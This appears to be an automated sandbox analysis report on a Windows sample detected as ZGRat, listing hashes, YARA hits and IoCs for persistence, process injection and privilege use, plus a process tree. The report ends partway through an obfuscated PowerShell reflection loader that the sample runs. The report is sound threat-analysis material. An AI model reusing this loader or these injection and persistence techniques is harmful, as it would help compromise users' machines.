Analysis
-
max time kernel
150s -
max time network
96s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
15-05-2024 02:06
Static task
static1
Behavioral task
behavioral1
Sample
fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe
Resource
win7-20240419-en
General
-
Target
fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe
-
Size
4.5MB
-
MD5
96422a2b982c99614d31dff7f2b64680
-
SHA1
e8f25aa518b0ef54bcdf770479ef28dd99dd8efc
-
SHA256
fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16
-
SHA512
882beba69a0ab2d6f7d048ecb4666b9ba4fe3ea17387ece13fb5bd589ce0db4d7343fbce6e2d836192aed2a920aae4edd1f4b6fa090fe807d54e024dbc234de9
-
SSDEEP
24576:Epu+lTdASQBeSbtpO2+RZ8XK5OG/wS4gIVnxff9t+oQ9GXiqgbaaz2ub2UbRdL/h:EX
Malware Config
Signatures
-
Detect ZGRat V1 33 IoCs
resource yara_rule behavioral2/memory/1808-2-0x0000000006540000-0x0000000006780000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-50-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-54-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-68-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-62-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-60-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-58-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-56-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-52-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-66-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-46-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-38-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-36-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-34-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-32-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-30-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-48-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-44-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-42-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-40-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-28-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-26-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-24-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-22-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-20-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-18-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-16-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-14-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-12-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-8-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-10-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-6-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 behavioral2/memory/1808-5-0x0000000006540000-0x000000000677A000-memory.dmp family_zgrat_v1 -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3292 created 616 3292 powershell.EXE 855 -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Wakgksusfez.vbs fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe -
Executes dropped EXE 2 IoCs
pid Process 2028 $77ef04f5 1188 $77c2e67a -
Drops file in System32 directory 14 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1808 set thread context of 2028 1808 fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe 95 PID 3292 set thread context of 2504 3292 powershell.EXE 98 PID 1808 set thread context of 1188 1808 fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe 238 -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={5259035C-F981-4DC7-B468-06F33B83B4B9}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715738860" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3292 powershell.EXE 3292 powershell.EXE 3292 powershell.EXE 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 1808 fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe 2504 dllhost.exe -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 1812 Process not Found 4692 Process not Found 3956 Process not Found 1460 Process not Found 4608 Process not Found 880 Process not Found 2392 Process not Found 3712 Process not Found 2704 Process not Found 1016 Process not Found 3732 Process not Found 3744 Process not Found 1432 Process not Found 1688 Process not Found 788 Process not Found 1788 Process not Found 1276 Process not Found 3996 Process not Found 5028 Process not Found 848 Process not Found 852 Process not Found 1652 Process not Found 3648 Process not Found 624 Process not Found 844 Process not Found 1828 smss.exe 3760 Process not Found 2724 Process not Found 456 Process not Found 5112 Process not Found 4400 Process not Found 116 Process not Found 1960 Process not Found 3172 Process not Found 448 Process not Found 3740 Process not Found 4952 Process not Found 3124 Process not Found 5084 Process not Found 4028 Process not Found 3484 Process not Found 4984 Process not Found 3228 Process not Found 3532 Process not Found 4900 Process not Found 1620 Process not Found 1524 Process not Found 4880 Process not Found 3572 Process not Found 868 Process not Found 2464 Process not Found 1416 Process not Found 4616 Process not Found 3388 Process not Found 3156 Process not Found 5032 Process not Found 4076 Process not Found 4024 Process not Found 2472 Process not Found 2560 Process not Found 368 Process not Found 1496 Process not Found 3624 Process not Found 2040 Process not Found -
Suspicious use of AdjustPrivilegeToken 32 IoCs
description pid Process Token: SeDebugPrivilege 1808 fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe Token: SeDebugPrivilege 3292 powershell.EXE Token: SeDebugPrivilege 3292 powershell.EXE Token: SeDebugPrivilege 2504 dllhost.exe Token: SeShutdownPrivilege 3520 Explorer.EXE Token: SeCreatePagefilePrivilege 3520 Explorer.EXE Token: SeAuditPrivilege 2796 svchost.exe Token: SeShutdownPrivilege 3520 Explorer.EXE Token: SeCreatePagefilePrivilege 3520 Explorer.EXE Token: SeShutdownPrivilege 3520 Explorer.EXE Token: SeCreatePagefilePrivilege 3520 Explorer.EXE Token: SeShutdownPrivilege 3520 Explorer.EXE Token: SeCreatePagefilePrivilege 3520 Explorer.EXE Token: SeShutdownPrivilege 3520 Explorer.EXE Token: SeCreatePagefilePrivilege 3520 Explorer.EXE Token: SeShutdownPrivilege 3520 Explorer.EXE Token: SeCreatePagefilePrivilege 3520 Explorer.EXE Token: SeShutdownPrivilege 3520 Explorer.EXE Token: SeCreatePagefilePrivilege 3520 Explorer.EXE Token: SeDebugPrivilege 1808 fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe Token: SeShutdownPrivilege 3520 Explorer.EXE Token: SeCreatePagefilePrivilege 3520 Explorer.EXE Token: SeShutdownPrivilege 3520 Explorer.EXE Token: SeCreatePagefilePrivilege 3520 Explorer.EXE Token: SeShutdownPrivilege 1836 mousocoreworker.exe Token: SeCreatePagefilePrivilege 1836 mousocoreworker.exe Token: SeShutdownPrivilege 1836 mousocoreworker.exe Token: SeCreatePagefilePrivilege 1836 mousocoreworker.exe Token: SeShutdownPrivilege 1836 mousocoreworker.exe Token: SeCreatePagefilePrivilege 1836 mousocoreworker.exe Token: SeShutdownPrivilege 1836 mousocoreworker.exe Token: SeCreatePagefilePrivilege 1836 mousocoreworker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1808 wrote to memory of 2028 1808 fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe 95 PID 1808 wrote to memory of 2028 1808 fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe 95 PID 1808 wrote to memory of 2028 1808 fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe 95 PID 1808 wrote to memory of 2028 1808 fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe 95 PID 1808 wrote to memory of 2028 1808 fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe 95 PID 1808 wrote to memory of 2028 1808 fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe 95 PID 1808 wrote to memory of 2028 1808 fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe 95 PID 1808 wrote to memory of 2028 1808 fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe 95 PID 1808 wrote to memory of 2028 1808 fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe 95 PID 3292 wrote to memory of 2504 3292 powershell.EXE 98 PID 3292 wrote to memory of 2504 3292 powershell.EXE 98 PID 3292 wrote to memory of 2504 3292 powershell.EXE 98 PID 3292 wrote to memory of 2504 3292 powershell.EXE 98 PID 3292 wrote to memory of 2504 3292 powershell.EXE 98 PID 3292 wrote to memory of 2504 3292 powershell.EXE 98 PID 3292 wrote to memory of 2504 3292 powershell.EXE 98 PID 3292 wrote to memory of 2504 3292 powershell.EXE 98 PID 2504 wrote to memory of 616 2504 dllhost.exe 855 PID 2504 wrote to memory of 668 2504 dllhost.exe 7 PID 2504 wrote to memory of 956 2504 dllhost.exe 12 PID 2504 wrote to memory of 332 2504 dllhost.exe 1108 PID 2504 wrote to memory of 744 2504 dllhost.exe 14 PID 2504 wrote to memory of 896 2504 dllhost.exe 15 PID 2504 wrote to memory of 1064 2504 dllhost.exe 17 PID 2504 wrote to memory of 1108 2504 dllhost.exe 18 PID 2504 wrote to memory of 1204 2504 dllhost.exe 19 PID 2504 wrote to memory of 1212 2504 dllhost.exe 20 PID 2504 wrote to memory of 1300 2504 dllhost.exe 21 PID 2504 wrote to memory of 1316 2504 dllhost.exe 22 PID 2504 wrote to memory of 1356 2504 dllhost.exe 23 PID 2504 wrote to memory of 1452 2504 dllhost.exe 24 PID 2504 wrote to memory of 1484 2504 dllhost.exe 25 PID 2504 wrote to memory of 1544 2504 dllhost.exe 26 PID 2504 wrote to memory of 1556 2504 dllhost.exe 27 PID 2504 wrote to memory of 1656 2504 dllhost.exe 28 PID 2504 wrote to memory of 1704 2504 dllhost.exe 29 PID 2504 wrote to memory of 1756 2504 dllhost.exe 30 PID 2504 wrote to memory of 1780 2504 dllhost.exe 31 PID 2504 wrote to memory of 1872 2504 dllhost.exe 32 PID 2504 wrote to memory of 1976 2504 dllhost.exe 33 PID 2504 wrote to memory of 1988 2504 dllhost.exe 34 PID 2504 wrote to memory of 2032 2504 dllhost.exe 35 PID 2504 wrote to memory of 1832 2504 dllhost.exe 36 PID 2504 wrote to memory of 2052 2504 dllhost.exe 37 PID 2504 wrote to memory of 2148 2504 dllhost.exe 38 PID 2504 wrote to memory of 2232 2504 dllhost.exe 40 PID 2504 wrote to memory of 2272 2504 dllhost.exe 41 PID 2504 wrote to memory of 2524 2504 dllhost.exe 42 PID 2504 wrote to memory of 2532 2504 dllhost.exe 43 PID 2504 wrote to memory of 2660 2504 dllhost.exe 783 PID 2504 wrote to memory of 2676 2504 dllhost.exe 1805 PID 2504 wrote to memory of 2752 2504 dllhost.exe 46 PID 1452 wrote to memory of 1828 1452 svchost.exe 134 PID 1452 wrote to memory of 1828 1452 svchost.exe 134 PID 2504 wrote to memory of 1828 2504 dllhost.exe 134 PID 2504 wrote to memory of 2796 2504 dllhost.exe 47 PID 668 wrote to memory of 2824 668 lsass.exe 49 PID 2504 wrote to memory of 2808 2504 dllhost.exe 320 PID 2504 wrote to memory of 2824 2504 dllhost.exe 49 PID 2504 wrote to memory of 2844 2504 dllhost.exe 50 PID 2504 wrote to memory of 2864 2504 dllhost.exe 51 PID 668 wrote to memory of 2824 668 lsass.exe 49 PID 1452 wrote to memory of 2464 1452 svchost.exe 2714 PID 1452 wrote to memory of 2464 1452 svchost.exe 2714 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:896
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1204 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tPwiuzgtHLaD{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$VNFujcOdhEcLqq,[Parameter(Position=1)][Type]$XUAzdKpsDO)$UBFuRTnJPRU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'efl'+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+''+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+'a'+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+'p'+[Char](101)+'','C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+'d'+[Char](44)+''+'A'+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$UBFuRTnJPRU.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+'Nam'+[Char](101)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$VNFujcOdhEcLqq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+','+''+'M'+''+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$UBFuRTnJPRU.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+'k'+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+'e'+''+[Char](119)+'Sl'+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$XUAzdKpsDO,$VNFujcOdhEcLqq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+'m'+'e,'+'M'+''+'a'+''+[Char](110)+'a'+[Char](103)+'e'+'d'